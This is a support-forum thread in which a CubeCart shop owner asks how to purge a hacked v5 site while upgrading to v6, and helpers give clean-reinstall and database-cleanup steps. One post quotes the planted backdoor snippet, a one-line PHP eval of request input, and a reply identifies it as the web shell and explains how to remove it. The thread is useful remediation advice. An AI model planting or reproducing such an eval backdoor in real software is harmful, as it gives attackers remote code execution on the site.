Jump to content

Upgrade v5 to v6 and Clean Install


Recommended Posts

I have a v5 installation that was compromised by the recent security flaw. I want to upgrade to v6 and be sure that the site is purged of any hidden files left by the hacker. Which approach would you recommend:

1/ rollback to a safe backup, lose all new customer data, then upgrade

2/ upgrade with compromised site, delete all cubecart files, then upload files from latest .zip installation pack

Am I right to assume that the method in (2) will work?

Link to comment
Share on other sites

Save only images from /images/source/, save the /includes/global.inc.php, save only logos from /images/logos/, and if you have a custom skin, save that.

In admin, Manage Hooks, Code Snippets tab, delete snippets you don't recognize.

Then nuke the site.

Upload the CC6 package. Copy back the globals.inc.php file. Copy back the images. Copy back your custom skin.

Let CC6 UPGRADE the database.


Link to comment
Share on other sites

Then nuke the site ... it's the only way to be sure:nep:

Your instructions were excellent

After upgrading I changed the database password on the server, and in the globals.inc.php file. I also changed all the admin passwords. I made a small tweak to the logo skin allocation settings. The payment/shipping options weren't carried over but installing new plugins was straightforward.

As always, hugely grateful for your support.

Link to comment
Share on other sites

  • 1 month later...

Are you running CC607 or better? Did you delete any Code snippets you did not recognize?

If there is something in the database, and you want to backup some or all of that database, then you won't know if that something also got into the backup.


Link to comment
Share on other sites

Yes. When I purged the old site (v5.2.9) I upgraded all the way to v6.0.8.

There weren’t any hooks or code snippets to remove - just the one snippet that I left in called snippetABCd1 ... <?php eval($_REQUEST["ABCd1"]);?> which I see across all my Cubecart installs except the ABCd1 bit changes from site to site. I assume this snippet is common to everyone?


Link to comment
Share on other sites

No. That is the snippet that is allowing backdoor access. The eval(...) is the key thing to look for.

Delete it.

Then, to make sure, use phpMyAdmin to look at the database table CubeCart_code_snippet to make sure it is completely empty.

Then, look at CubeCart_hooks and verify that, if you have no plugins installed, there are no hooks registered here.

Then look in the folder /includes/extra/ and delete all files that begin with snippet_.

Link to comment
Share on other sites

Fortunately I did a backup after completing my purge/upgrade, so I have something decent to fall back onto.

After completing the rollback I will delete the snippet, switch to a new skin and dispose of the old, and then carry out a visual review of what is stored in the database.

Thank you bsmither

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Create New...